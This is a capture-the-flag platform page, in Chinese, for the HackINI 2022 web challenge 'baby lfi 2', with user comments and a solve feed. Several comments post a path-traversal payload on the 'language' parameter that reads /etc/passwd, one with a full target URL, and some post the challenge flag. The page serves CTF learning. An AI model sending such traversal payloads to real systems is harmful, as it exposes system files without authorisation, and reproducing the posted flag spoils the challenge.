baby lfi 2WEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2022
题目作者: 未知
一  血: Aman
一血奖励: 0金币
解  决: 2810
提  示:
描  述:
What about making things a bit harder ?
评论
maxiaoyu 2月前

根据上一题也就是baby lfi 1我们依旧使用language来作为参数,根据题目提示,有一个目录是languages的合法目录,因此我们进入这个目录,并使用多个../来退回到根目录,并访问/etc/passwd来拿到flag。

回复 0

000ooo 1年前

?language=./languages/../../../../etc/passwd

回复 1

pandarking 1年前

shellmates{yOU_M4De_yOUr_waY_7hRough_iT}

回复 0

ljt1016 1年前

为什么不合法就要增加中间的路径(../)?以及,为什么/language前面要加个"."

回复 0

小白帽来挖个漏洞 1年前

https://blog.csdn.net/guanrongl/article/details/142907012

回复 2

MOCHAOLIN 1年前

http://82.157.146.43:15979/?language=./languages/../../../../etc/%70%61%73%73%77%64

回复 0

1005667204 1年前

./language/../../../../../etc/passwd

回复 0

YOLO77w 1年前

和baby lfi 一样的方法

回复 0

15346899030 2年前

shellmates{yOU_M4De_yOUr_waY_7hRough_iT}

回复 1

xiaoxiao972521 2年前

/index.php?language=./languages/../../../../etc/passwd

回复 0

WriteUp

image
gushi666

2 金币

评分(8)

解题动态

liffer 攻破了该题 13小时前
guguji 攻破了该题 15小时前
可可萝 攻破了该题 16小时前
杰哥 攻破了该题 22小时前
jade.wen 攻破了该题 1天前
Spotlight 攻破了该题 1天前
初学者321 攻破了该题 1天前
ctflearner 攻破了该题 1天前
AOD 攻破了该题 1天前
cunhong 攻破了该题 2天前
赤花满楼 攻破了该题 2天前
fml 攻破了该题 2天前
xingzou 攻破了该题 2天前
wujita01 攻破了该题 2天前
lx207 攻破了该题 3天前
bigbendan 攻破了该题 3天前
白开水 攻破了该题 4天前
wupeiyuan 攻破了该题 4天前
kuaior 攻破了该题 4天前
J辰 攻破了该题 4天前
问题反馈